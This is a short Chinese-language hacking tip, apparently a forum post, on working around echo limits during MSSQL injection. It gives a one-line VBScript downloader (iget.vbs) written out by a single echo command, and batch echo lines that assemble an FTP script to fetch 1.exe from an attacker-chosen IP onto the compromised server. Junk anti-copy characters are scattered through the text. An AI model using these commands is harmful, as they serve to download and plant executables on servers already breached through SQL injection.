mssql注射时不可以多次echo的解决办法

韩冰

<>解决办法:
1.iget.vbs一次写入
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
" ^, G: h1 |" R2 y1 ~' w4 O6 ~0 G4 P
2 H# v/ F8 ?# }Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
. r; V, A- }% q4 Y9 ?
! U$ }2 C) s. g7 s/ f这样我们可以一次echo成功,echo版本:
4 U9 n# a( S* j' d( x) _5 `6 s
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
$ t; M: C( D* i* C* R
8 e$ I, }5 N" [8 z: j4 _8 r+ g3 a
" _; Z. l+ w- d/ z& o( ~+ T+ D2.bat调用ftp脚本的写法(by envymask)

' S. m8 y/ Q# c9 Aecho ftp&gt;1.vbs
  l- B3 z. E' z/ aecho open ip&gt;2.vbs
echo u&gt;3.vbs
echo s&gt;4.vbs
echo binary&gt;5.vbs
echo get 1.exe&gt;6.vbs
echo bay&gt;7.vbs

% z. v2 g; p7 M  I. j* O8 c9 `* Ecopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
</P>